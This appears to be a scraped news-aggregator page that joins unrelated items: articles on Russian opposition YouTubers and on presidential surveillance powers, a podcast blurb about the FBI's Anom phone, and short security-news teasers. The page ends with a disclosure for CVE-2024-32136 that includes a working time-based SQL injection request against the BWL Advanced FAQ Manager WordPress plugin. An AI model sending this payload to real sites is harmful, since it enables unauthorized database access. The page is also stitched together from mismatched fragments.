A WIRED investigation, based on more than 22 million flight coordinates, reveals the complicated truth about the first full-blown police drone program in the US—and why your city could be next.

The Age of the Drone Police Is Here

When a drug kingpin named Microsoft tried to seize control of an encrypted phone company for criminals, he was playing right into its real owners’ hands.

Inside the Biggest FBI Sting Operation in History

YouTube remains the only major US-based social media platform available in Russia. It’s become "indispensable" to everyday people, making a ban tricky. Journalists and dissidents are taking advantage.

In December 2020, Vladimir Putin held his end-of-the-year press conference as normal. Despite the Covid-19 pandemic still raging in Russia and worldwide, the president insisted that things would be OK. He had set aside 350 billion rubles ($4.8 billion) “to give social benefits to people, families, both children, doctors, and students.”

Two weeks later and nearly 1,000 miles away, the opposition Anti-Corruption Foundation uploaded a video to its YouTube channel. In it, Alexei Navalny introduces the world to “Putin’s palace,” which he dubbed “the world’s largest bribe.”

Over nearly two hours, Navalny walks viewers through the trappings of the palatial datcha, on the Black Sea coast. A 2-million-ruble sofa, a 2-million-ruble vanity, a dining table worth nearly 4 million rubles. The ubiquitous gold leafing on the walls, a private theater, a velvet-lined hookah bar, a casino, even a _Dance Dance Revolution_ room. The construction of such a lavish abode would have cost Putin and his oligarchic backers over 100 billion rubles ($1 billion) of money pilfered from the Russian state, Navalny tells the viewer. Money that could have gone to people, families, children, doctors, and students.

The Russian-language video exploded, far surpassing anything Navalany and the Foundation had ever produced. Within weeks, it blew past 100 million views, and it has added another 32 million views since then—nearing the population of Russia itself.

The Foundation’s popularity on the world’s largest video-sharing platform had been growing massively over the preceding year—particularly as Russians were stuck indoors, and as the Kremlin intensified its crackdown on the independent press.

“Twenty years of total government control have turned television into an incessant marathon of disgraceful propaganda, lies, and censorship,” as Navalny told his viewers in a 2020 video. Behind him, a stack of TVs broadcast different clips of Russian TV presenter Vladimir Solovyov, a ubiquitous face on the Russia1 channel.

In December of that year, Navalny began his regular video dispatches with a startling introduction: “Hi, it’s Navalny. I know who wanted to kill me. I know where they live. I know where they work. I know their real names.”

Working with investigative journalism outfit Bellingcat, Navalny had posed as a Kremlin official in order to coax a confession out of one of his would-be assassins. The alleged agent recounted how the team of Russian operatives applied the nerve agent Novichok to Navalny’s underwear. Navalny recorded the whole thing and posted it directly to his YouTube channel.

In a follow-up video, Navalny continues to break down the failed murder plot in front of a wall featuring each of the men’s photos, maps of the operation, and red twine connecting everything.

In the West, Navalny’s appeal was often shortened to that of simply an opposition figure—a divisive one, for some, who became the de facto alternative to Putin after the other alternatives were killed or jailed.

But in the years leading up to his 2021 imprisonment and death in February 2024, Navalny became much more than just a politician—and the media apparatus he became the face of became bigger than him.

While Russia has grown considerably more autocratic in recent years, with its elections even more tightly scripted and its media ever more controlled by the Kremlin, YouTube remains one of the few US-based social media sites still available in the country and a reliable and effective conduit to the Russian public. It could be key to determining what happens next in Moscow—if YouTubers can stay ahead of Kremlin censorship.

“With minimal resources, we were essentially able to establish a direct competitor of Putin’s propaganda television,” says Vladimir Milov. “We are still behind them, but we are breathing down their back.”

Milov is a former deputy minister with the Russian government, a longtime Navalny associate, and a YouTube creator in his own right. I caught up with him in Vilnius, where he’s been exiled since Moscow began criminal proceedings against him. Last year, Milov was convicted by the Russian courts of disseminating “war fakes” and sentenced to eight years in prison in absentia.

Milov’s regular updates, which tend to focus on economics and finance, go out to his 500,000-plus subscribers, and often rack up around a million views. Leonid Volkov, another Navalny associate who helps run the Anti-Corruption Foundation, boasts another 165,000 followers. Dasha Navalnaya, Alexei Navalny’s daughter, has her own channel where she interviews GenZ Russians about the state of their country.

Above that, independent media have found a second home on YouTube as well. Meduza, an independent media organization that had to decamp to Latvia after being declared a “foreign agent” under Russian law, has nearly 800,000 subscribers. The BBC’s Russian service, which left the country amid a 2022 media crackdown, broadcasts regularly to its 2.5 million subscribers.

Cobbling together the analytics across these various channels, Milov says these opposition YouTubers have about 10 million to 15 million dedicated viewers inside Russia—while another 20 million viewers may stumble across their content from time to time.

​”Our message gets through to the Russian people,” Milov says. “We are serving as a very effective alternative broadcasting tool that really competes with Putin's propaganda.”

VCIOM, a pollster loyal to the Kremlin, has found that a plurality of Russians still prefer to get their news from heavily censored Russian television, but their trust in the format has plummeted, from nearly 50 percent in 2016 to just 25 percent today. Meanwhile, trust in online news has jumped by roughly the same degree.

Meanwhile, as Western programming becomes rarer and rarer, many Russians are turning to YouTube for their primary source of entertainment—especially for kids’ programming. Eight of the 10 most-subscribed Russian YouTube channels, according to rankings compiled by analytics firm Socialblade, are targeted at young children.

So Russians are losing faith in the state-approved TV news, increasingly trusting of online media, and are looking to YouTube for entertainment. It has delivered tens of millions of people right at the opposition’s doorstep.

Even if most Russian YouTube users are looking for content to pacify their children, bringing them on the platform has enormous benefits, Milov says. “There's this magical black box which is called YouTube recommendations.” He says plenty of his followers don’t even watch his videos—they listen. If Russians are letting the algorithm choose their next video while they cook dinner or fold laundry, it increases the chances his voice will reach a Russian who has never heard him before.

Milov stresses that YouTube isn’t just a one-way service: Because it allows users to comment and chat anonymously, it provides an extraordinary chance for regular Russians to express themselves without fear of censorship.

“The amount of our feedback is enormous,” he says. “Just myself, alone, I literally get messages, every day, from at least hundreds of people from across the country. When something serious happens? Thousands.” Sometimes, Milov says, his first indication that something terrible has happened in Russia is seeing just how many unread messages he has in his YouTube inbox.

Milov says this feedback reinforces the idea, supported even by Kremlin-approved pollsters, that opposition to the war in Ukraine is growing. But it also provides some important details and nuance. “So this is like, I would say, an enormous focus group, with which you can also communicate. You can ask them questions back.” He chuckles, thinking of the notorious Russian security and intelligence agency: “You know, the FSB would kill for this kind of information.”

“Obviously, the question is, why didn’t Putin shut down YouTube?” Milov says. “It’s easier said than done.”

In recent years, Moscow has deployed an array of strategies to cow and kill independent media and the open internet in Russia. Platforms like Facebook, Twitter, and TikTok have been blocked altogether. Independent media like Meduza, TV Rain, and The Insider have been declared “undesirable” or labeled “foreign agents.”

Through it all, YouTube has survived.

Milov says the Kremlin was too slow to move on YouTube. By the time Moscow was banning other popular Western platforms, the Google-owned video platform had become indispensable to everyday Russians. “They kind of let the genie out of the bottle,” Milov says.

“YouTube is mommies showing cartoons to kids, teenagers are watching music videos, people are watching comedians, elderly folks watching old Soviet movies, which are widely available there, and so on,” he says. “And you shut it all down? So you have these empty evenings now, from this point on.”

Unable to disrupt YouTube, the Kremlin tried desperately to compete with it.

Moscow had high hopes for Rutube, a long-suffering YouTube clone which was relaunched in 2020 after a merger with the media arm of state-controlled energy giant Gazprom. If the site’s “top videos” section is to be believed, it hasn’t worked—some had racked up view counts in the mid-thousands.

VK, Russia’s answer to Facebook, has fared slightly better with its video-sharing platform, and it is rife with pro-Kremlin broadcasters. But even its most popular channels have just a tiny fraction of the biggest Russian-language YouTube accounts.

“It's like a big room, but it's empty,” Milov says of these Kremlin-backed alternatives.

Having failed to compete with his online critics, Milov believes Putin opted for a more direct strategy. Just days before I arrived in Vilnius, thugs appeared outside the home of Leonid Volkov, former chair of the Anti-Corruption Foundation and Nalvany chief of staff. Armed with hammers, they savagely beat him. Lithuanian intelligence believe the men arrested were operating on orders from Russia. A week after the attack, Volkov was back on YouTube, his arm in a sling, “I am not going to stop—although I will gesticulate less in the coming weeks,” he said.

Milov emailed me the day I arrived to apologize that, due to his new security protocols, he wouldn’t be able to show me around his home broadcast studio.

Last November, the YouTube channel Volgograd Watch uploaded a new video trying to answer a difficult question: “When will the mobilized be returned?”

Subscribers of the channel were asking when Russia’s conscripts on the front line might return home. Evgeny Kochegin, host of the channel, responded by providing a litany of links recommending anti-war groups and resources on how to dodge the draft. Kochegin himself fled conscription and was convicted in absentia for disseminating “fake news.”

In exile, Kochegin has tried to help others avoid being pressed into military service, and took to YouTube to do it, racking up a modest 30,000 subscribers. In May, however, Kochegin found YouTube to be an unreliable partner. His video was blocked for Russian viewers.

Agents Media, an independent Russian news outlet, reviewed four different removal notices targeting human rights and anti-war YouTube channels. The news outlet obtained emails from YouTube’s legal team, threatening to take offline an entire channel. In the email to the OVD-Info channel, YouTube wrote that the channel had violated Russian Law #149-FZ and that “if you do not remove the content, Google may be required to block it.”

According to a company transparency report, Google has received hundreds of thousands of removal requests from the Russian government since 2022, including nearly 67,000 on the grounds of “national security,” over 200 for “government criticism,” and one for violating the electoral law.

More than 1,000 applications from Moscow specifically cited Law #149-FZ, asking for the removal of nearly 1 million pieces of content—which could include channels, videos, or comments. Google reports that it approved more than 80 percent of those removal requests.

An open letter published in May, signed by major Russian NGOs and Reporters Without Borders, called on Google to stop adhering to these requests from Moscow. “We are very concerned that the company appears to be helping the Russian censor to silence human rights and anti-war voices,” they wrote.

In a statement, a spokesperson for YouTube insisted that if the company has concerns that legal requests are being used to silence dissidents, “we will push back”—noting that Russian courts have fined Google in the past for refusing to comply with its orders.

YouTube says it has removed more than 12,000 channels and over 140,000 videos relating to the war in Ukraine for violating the platform’s policies—including pro-Putin propagandists, Kremlin-controlled media outlets, and content from the Russian Ministry of Foreign Affairs.

The YouTube spokesperson, however, ignored questions as to why it has been so willing to respond to requests under Law #149-FX.

Whether their channels are at risk from legal requests from Moscow, or whether Moscow blocks their channels entirely—the Russian dissidents are always making contingency plans. “They will not kill us by just shutting down one thing and making the other cooperate with the regime,” Milov says. “We'll navigate through.”

One such plan is to wind up right where the problem began: on TV.

Not long after Russia invaded Ukraine in February 2022, a group calling itself the Denis Diderot Committee began calling on major satellite television providers to stop beaming Kremlin propaganda into Russia and Europe — and replace it with real news.

“That's the ultimate goal of our effort—to actually provide alternative media channels into the Russian television space that are not controlled by the Russian government,” Jim Phillipoff, one half of the committee, told WIRED at the time.

Two years on, the committee scored a huge win. Satellite provider Eutelsat took up the committee’s challenge and inked a deal with Reporters Without Borders to broadcast 11 channels of independent Russian news and content into the region, with the option to add 14 more. They call it the Svoboda Satellite Package—using the Russian word for “freedom.”

Phillipoff told WIRED this week that they have begun broadcasting into 4.5 million households in Russia, and another 61 million households in the broader region—and they hope to grow that number by securing space on other regional satellites.

While the satellite is simply rebroadcasting some existing channels, Philipoff says they’ve also created some channels from scratch—in some cases made up of dissident Russians’ YouTube content. They’ve been in talks with Volkov to help rebroadcast some of the work from the Anti-Corruption Foundation and other opposition groups. (They have also explored how to cooperate with eQsat, a like-minded effort to broadcast digital news files using satellites, which WIRED revealed last September.)

While Russian television remains under the thumb of the Kremlin, and Google remains willing to block content at its behest, Svoboda exists to reject the censorship altogether, Phillipoff says.

“The goal of our project is to circumvent this control.”

Russians Love YouTube. That’s a Problem for the Kremlin

This week on the Lock and Code podcast, we speak with Joseph Cox about the FBI's successful backdoor into the phone startup Anom.

_This week on the Lock and Code podcast…_

This is a story about how the FBI got everything it wanted.

For decades, law enforcement and intelligence agencies across the world have lamented the availability of modern technology that allows suspected criminals to hide their communications from legal scrutiny. This long-standing debate has sometimes spilled into the public view, as it did in 2016, when the FBI demanded that Apple unlock an iPhone used during a terrorist attack in the California city of San Bernardino. Apple pushed back on the FBI’s request, arguing that the company could only retrieve data from the iPhone in question by writing new software with global consequences for security and privacy.

“The only way to get information—at least currently, the only way we know,” said Apple CEO Tim Cook, “would be to write a piece of software that we view as sort of the equivalent of cancer.”

The standoff held the public’s attention for months, until the FBI relied on a third party to crack into the device.

But just a couple of years later, the FBI had obtained an even bigger backdoor into the communication channels of underground crime networks around the world, and they did it almost entirely off the radar.

It all happened with the help of Anom, a budding company behind an allegedly “secure” phone that promised users a bevvy of secretive technological features, like end-to-end encrypted messaging, remote data wiping, secure storage vaults, and even voice scrambling. But, unbeknownst to Anom’s users, the entire company was a front for law enforcement. On Anom phones, every message, every photo, every piece of incriminating evidence, and every order to kill someone, was collected and delivered, in full view, to the FBI.

Today, on the Lock and Code podcast with host David Ruiz, we speak with 404 Media cofounder and investigative reporter Joseph Cox about the wild, true story of Anom. How did it work, was it “legal,” where did the FBI learn to run a tech startup, and why, amidst decades of debate, are some people ignoring the one real-life example of global forces successfully installing a backdoor into a company?

> The public…and law enforcement, as well, \[have\] had to speculate about what a backdoor in a tech product would actually look like. Well, here’s the answer. This is literally what happens when there is a backdoor, and I find it crazy that not more people are paying attention to it.
> 
> Joseph Cox, author, Dark Wire, and 404 Media cofounder

Tune in today to listen to the full conversation.

Cox’s investigation into Anom, presented in his book titled Dark Wire, publishes June 4.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 800 arrests, 40 tons of drugs, and one backdoor, or what a phone startup gave the FBI, with Joseph Cox: Lock and Code S05E12 

Threat actors are evolving, yet Cyber Threat Intelligence (CTI) remains confined to each isolated point solution. Organizations require a holistic analysis across external data, inbound and outbound threats and network activity. This will enable evaluating the true state of cybersecurity in the enterprise.
Cato’s Cyber Threat Research Lab (Cato CTRL, see more details below) has recently released

SASE Threat Report: 8 Key Findings for Enterprise Security

Donald Trump has vowed to go after political enemies, undocumented immigrants, and others if he wins. Experts warn he could easily turn the surveillance state against his targets.

Every president of the United States has within their grasp the power of a vast surveillance state that has grown significantly over the past few decades and has beaten back any real effort to rein it in. Through America’s numerous enigmatic intelligence agencies, presidents possess the ability to dive deeply into the communications, movements, and relationships of everyday Americans. Presidents of both parties have abused the surveillance state, but under a second Trump administration, this power could be abused in ways it has never been before.

Donald Trump, a now convicted felon and the presumptive 2024 Republican presidential nominee, has said he plans to prosecute his political opponents should he return to the White House. He’s said he would allow states to monitor pregnant women and prosecute those who seek abortions. Trump wants to deport millions of undocumented immigrants. He plans to invoke the Insurrection Act to quell civil unrest, which means sending the military into the streets. The much publicized Project 2025 outlines how he would quickly replace thousands of career civil servants in the federal government with loyalists.

If a president was interested in prosecuting their political opponents, crushing protests, targeting undocumented immigrants, and had the right people in place to help them carry out those plans, surveillance could become a valuable tool for accomplishing those goals. Like former US president Richard Nixon in the late 1960s and early 1970s, Trump could use the surveillance powers available to him to monitor his political opponents, disrupt protest movements, and more.

Nixon and former FBI director J. Edgar Hoover famously surveilled the president’s political opponents and activists, including Martin Luther King Jr., through a program called COINTELPRO. One of the main goals of the program was to “expose, disrupt, misdirect, discredit, or otherwise neutralize” civil rights groups.

If he so desired, Trump could create his own version of this program, but he’d be working with much more advanced technology—and it’d be in a time when there are countless data points available on every American. Hoover could have only dreamed of a world where everyone was walking around with tracking devices.

“So much of what we depend on, in terms of the rule of law, depends on norms. When those norms are ignored, that’s when things start to fall apart,” says Jeffrey L. Vagle, an assistant professor of law at Georgia State University. “Some of the norms, like prosecutorial discretion, might be eroded or disappear entirely. That could mean a number of things in terms of surveillance.”

Vagle says that if a second Trump administration wanted to defend its abuse of surveillance powers, it could stretch the use of national security as a justification for doing so. He says presidents have done this in the past in other ways.

“Administrations from both parties have invoked the term ‘national security’ and have used national security loopholes to justify surveillance and profiling,” says Patrick Toomey, deputy director of the American Civil Liberties Union’s National Security Project. “They have too often used national security as a pretext for law enforcement to target Muslims, communities of color, and immigrants.”

Toomey says Trump has sent “mixed signals” when it comes to how he feels about surveillance, but he’s made it clear he plans to target his political opponents in various ways if he’s elected again.

“A second Trump administration could be disastrous for many of our most fundamental freedoms,” Toomey says.

The administration may not even need to come up with a justification for surveilling Americans without a warrant, because it could simply purchase scores of people's personal data. The federal government has been known to purchase data from private brokers in the past, and doing so doesn’t require a warrant.

“We are just awash in data, and data brokers can just collect and sell these data,” Vagle says. “Law enforcement or quasi-law enforcement can collect that information.”

Surveillance can be done in secret so that the people being surveilled don’t realize they’re being surveilled, or it can be done openly as a way to stifle free expression, Vagle says. The government might tell you they’re keeping an eye on people, and then you might be less likely to speak out.

“If you think you’re being watched, you act differently,” Vagle says. “You could see a Trump version of COINTELPRO—only maybe not so covert. They might be more open about it with the idea that it might chill speech.”

As for the abortion issue, some of what may occur will depend on the future legal status of abortion, which could involve a US Supreme Court decision or congressional action. A major change in its legal status would likely affect how the federal government approaches the issue. If it remains a state issue, the federal government wouldn’t typically get involved in how a state is implementing a law it’s passed, but that’s not to say it couldn’t. If a state wanted help tracking people who are crossing state lines for abortions, for example, the federal government could conceivably assist with that.

“The federal government is not in the business of enforcing state laws, but there are a lot of what-ifs. How crazy might a Trump administration be willing to be?” Vagle says.

Whether it’s monitoring political opponents, activists, immigrants, or pregnant people, there are many ways in which a second Trump administration could utilize surveillance powers to exert more control over the populace. If the FBI and the Department of Justice are staffed with people who won’t push back when Trump orders them to do things that might be legally or morally questionable, they may carry out his wishes, and Americans may discover how much their privacy rights have eroded over the years.

“One of the things about Project 2025 is that it’s clear that the Trump camp, and more broadly the Republican Party that’s behind Trump, want to make it a more organized presidency than his first presidency was,” Vagle says. “It would be very unsurprising if the Department of Justice and the FBI dismissed anyone if they even had a whiff of disloyalty.”

How Donald Trump Could Weaponize US Surveillance in a Second Term

The North Korea-linked threat actor known as Andariel has been observed using a new Golang-based backdoor called Dora RAT in its attacks targeting educational institutes, manufacturing firms, and construction businesses in South Korea.
"Keylogger, Infostealer, and proxy tools on top of the backdoor were utilized for the attacks," the AhnLab Security Intelligence Center (ASEC) said in a report

Andariel Hackers Target South Korean Institutes with New Dora RAT Malware

Plus: A whistleblower claims the Biden administration falsified a report on Gaza, “Operation Endgame” disrupts the botnet ecosystem, and more.

If you have a crypto wallet containing a fortune but forgot the password, all may not be lost. This week, a pair of researchers revealed how they cracked an 11-year-old password to a crypto wallet containing roughly $3 million in bitcoins. With a lot of skill and a bit of luck, the researchers uncovered a flaw in how a previous version of the RoboForm password manager generates passwords that allowed them to accurately figure out the missing login and access the buried treasure.

Police in Western countries are using a new tactic to go after cybercriminals who remain physically out of reach of US law enforcement: trolling. The recent takedowns of ransomware groups like LockBit go beyond the traditional disruption of online infrastructure to include messages on seized websites meant to mess with the minds of criminal hackers. Experts say these trollish tactics help sow distrust between cybercriminals—who already have ample reason to distrust one another.

A graduate student at the University of Minnesota has been charged under the Espionage Act for photographing a shipyard in Virginia where the US Navy assembles nuclear submarines and other vessels whose components are classified. What makes the case novel, however, is that he allegedly took the photos with a drone, making his prosecution likely the first of its kind in the US.

It was a big week for cops taking down botnets (as you’ll read more about below). This week, the US announced that it had disrupted what may be the “largest botnet ever,” according to FBI director Christopher Wray. The botnet, called 911 S5, included some 19 million hijacked IP addresses around the world, which authorities say were used to carry out billions of dollars in Covid-19 relief fraud, make bomb threats, traffic in child sexual abuse material, and more.

But that’s not all. Each week, we round up the security news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

More than a half-million internet routers were disabled last year in a malware attack carried out by an unknown threat actor targeting a US internet service provider. Launched in late October, the attack—one of the largest ever against the sector—reportedly disrupted internet across several Midwestern states. The attack was first disclosed this week by the security firm Black Lotus Labs, which did not identify the specific company affected. However, Ars Technica reports that the incident appears to have impacted a ISP called Windstream, which provides internet service to 18 states in the US Midwest and South.

Black Lotus Labs researchers say the attacker used off-the-shelf Chalubo malware to gain access to the routers, and that their firmware was eventually overwritten, effectively bricking the devices. The disruption resulted in a flood of complaints on a forum about the damaged routers. “The routers now just sit there with a steady red light on the front,” a user wrote on the DSLReports forum. “They won't even respond to a RESET.”

**Whistleblower Claims US “Falsified” Gaza Report to Protect Arms Sales**

The Biden administration allegedly fabricated the conclusion of a report released in early May which found the United States did not have “complete information to verify” whether US-made weapons had been used by Israel in contravention of international humanitarian law, according to a whistleblower, Stacy Gilbert, a senior civil-military expert who resigned in protest this week from the US State Department. Gilbert says the State Department experts who compiled the report clearly implicated Israel in limiting the amount of food and medical supplies able to reach Gaza; however, the report was reportedly taken out of the experts’ hands and then “edited at a higher level.”

The report consisted of a mandatory national security assessment that, had Israel been found in violation of humanitarian law, would have obligated the US to discontinue its arms sales. At the time of the report’s publishing, critics of the administration’s Gaza policy accused the White House of willfully ignoring the conduct of Israeli forces attempting to disrupt food deliveries to the famine-stricken Palestinian territory. Gilbert is the second US official to publicly resign this week in protest over the US’s involvement in the attacks.

**“Operation Endgame” Knocks Down Botnet Underworld**

An international coalition of law enforcement agencies, cybersecurity firms, and other organizations announced this week the disruption of large swathes of the global botnet ecosystem. Branded “Operation Endgame,” the effort targeted malware “droppers,” or malicious software that’s used to infiltrate a machine so it can be used to infect a machine with additional malware more easily. The droppers Operation Endgame targeted include IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot, according to Europol, which says authorities seized more than 100 servers and 2,000 websites allegedly linked to cybercriminal activity. Law enforcement also arrested four “high-value” individuals; Germany added eight others to its most-wanted list. One of the “main suspects,” according to Europol, amassed a cryptocurrency fortune worth 69 million euros ($74 million) by renting out infrastructure for ransomware attacks. And the action isn’t over: The Operation Endgame website indicates a new announcement coming in the next several days.

**Pro-Israel Influence Op, Driven by AI, Targeted Americans on Meta Apps**

Meta says it has shut down an AI-driven network comprising hundreds of fake Facebook and Instagram accounts linked to an Israeli business intelligence firm. The company, Stoic, is accused of accepting contracts to propagate inauthentic pro-Israel content across the platforms for the purpose of manipulating North American users’ political views. Meta claimed Stoic’s influence operation was still in its “audience building” phase, “before they were able to gain engagement among authentic communities.”

Mysterious Hack Destroyed 600,000 Internet Routers

Artificial Intelligence (AI) company Hugging Face on Friday disclosed that it detected unauthorized access to its Spaces platform earlier this week.
"We have suspicions that a subset of Spaces’ secrets could have been accessed without authorization," it said in an advisory.
Spaces offers a way for users to create, host, and share AI and machine learning (ML) applications. It also functions as a

AI Company Hugging Face Notifies Users of Suspected Unauthorized Access

BWL Advanced FAQ Manager version 2.0.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL InjectionDate: 14 Apr 2024Exploit Author: Ivan Spiridonov (xbz0n)Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135Version: 2.0.3Tested on: Ubuntu 20.04CVE: CVE-2024-32136SQL InjectionSQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.Affected ComponentsPlugin: BWL Advanced FAQ ManagerVersion: 2.0.3Affected Parameter: 'date_range'Affected Page: /wp-admin/edit.phpDescriptionThe vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.Proof of ConceptManual ExploitationThe following GET request demonstrates the vulnerability:GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analyticsConnection: closeCookie: [Relevant Cookies]Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.RecommendationsBWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.

Tag

#intel